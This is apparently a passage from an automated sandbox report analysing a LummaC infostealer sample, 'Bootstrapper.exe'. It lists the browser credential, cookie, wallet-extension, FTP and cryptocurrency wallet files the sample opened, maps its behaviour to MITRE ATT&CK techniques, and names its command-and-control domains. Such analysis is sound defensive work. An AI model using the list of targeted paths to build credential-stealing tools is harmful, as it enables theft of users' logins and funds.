Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2480224915.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bootstrapper.exe PID: 5416, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Bootstrapper.exe PID: 5416, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Deobfuscate/Decode Files or Information	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Bootstrapper.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://dxkushha.com/apivd	0%	Avira URL Cloud	safe
https://dxkushha.com/D	0%	Avira URL Cloud	safe
https://dxkushha.com/t	0%	Avira URL Cloud	safe
https://dxkushha.com/Z	0%	Avira URL Cloud	safe
https://dxkushha.com/rG	0%	Avira URL Cloud	safe
https://dxkushha.com/api	0%	Avira URL Cloud	safe
https://dxkushha.com/g	0%	Avira URL Cloud	safe
https://dxkushha.com/	0%	Avira URL Cloud	safe
https://dxkushha.com/apimpQ	0%	Avira URL Cloud	safe
https://dxkushha.com:443/api	0%	Avira URL Cloud	safe
https://dxkushha.com/L	0%	Avira URL Cloud	safe
dxkushha.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dxkushha.com	104.21.80.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
prisonyfork.buzz	false		high
hummskitnj.buzz	false		high
https://dxkushha.com/api	true	Avira URL Cloud: safe	unknown
dxkushha.com	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dxkushha.com/t	Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dxkushha.com:443/api	Bootstrapper.exe, 00000000.00000003.2541980886.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.000000000167C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dxkushha.com/apivd	Bootstrapper.exe, 00000000.00000003.2502138943.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502922572.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2480224915.00000000016FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dxkushha.com/rG	Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dxkushha.com/g	Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Bootstrapper.exe, 00000000.00000003.2424014383.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394723847.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394578963.0000000002961000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Bootstrapper.exe, 00000000.00000003.2424014383.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394723847.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394578963.0000000002961000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	false		high
